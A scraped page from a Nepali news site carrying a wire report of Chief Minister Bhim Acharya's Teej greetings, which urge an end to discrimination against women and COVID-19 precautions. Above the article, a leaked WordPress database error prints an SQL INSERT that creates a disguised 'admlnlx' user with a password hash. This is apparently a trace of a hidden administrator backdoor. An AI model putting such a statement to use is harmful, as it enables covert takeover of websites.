WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BB3Dl2I55JsZ4.MQYiuYGLrt4oitID0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-14 19:44:22', '', 'admlnlx', 'admlnlx')

तीजले महिलाविरूद्ध हुने सबै प्रकारका विभेद अन्त्य गरोस्ः मुख्यमन्त्री आचार्य – Gaule Khabar

तीजले महिलाविरूद्ध हुने सबै प्रकारका विभेद अन्त्य गरोस्ः मुख्यमन्त्री आचार्य

तीजले महिलाविरूद्ध हुने सबै प्रकारका विभेद अन्त्य गरोस्ः मुख्यमन्त्री आचार्य

बिराटनगर । प्रदेश नं १ का मुख्यमन्त्री भीम आचार्यले हरितालिका तीजले महिलाविरूद्ध हुने सबै प्रकारका विभेद अन्त्य गर्दै सभ्य र समतामूलक समाज निर्माण गर्न प्रेरणा मिलोस् भत्रे शुभकामना व्यक्त गर्नुभएको छ ।

हरितालिका तीजको अवसरमा मुख्यमन्त्री आचार्यद्वारा बिहीबार जारी शुभकामना सन्देशमा स्वदेश तथा विदेशमा रहनुभएका नेपाली महिला दिदीबहिनीमा सुख, शान्ति, अटल सौभाग्य समृद्धि, सुस्वास्थ्य एवं दीर्घायुको शुभकामना व्यक्त गर्नुभएको छ ।

उहाँले यस पर्वले समाजलाई भावनात्मक एकताको सूत्रमा बाध्न मद्दत गरेको भन्दै हरितालिका तीज पर्वको मौलिकतालाई कायम राख्न यसको सांस्कृतिक महत्वको जगेर्ना गर्न सबैलाई आग्रह गर्नुभयो । सन्देशमा उहाँले भन्नुभएको छ, “यो पर्व मनाउने सन्दर्भमा यदाकदा देखिने भड्किलोपन र खर्चिलोपनलाई कम गर्दै यसलाई एउटा चेली माइतीको भेटघाट, समाज जोड्ने पुलको रुपमा लिई मौलिकता जर्गेना गर्न हामी सबैले भूमिका निर्वाह गर्नुपर्छ, कोभिड–१९ का कारण सङ्क्रमणको जोखिम बढेकाले जनस्वास्थ्यका मापदण्ड पालन गरेर चाड मनाउन पनि अनुरोध गर्दछु ।” रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका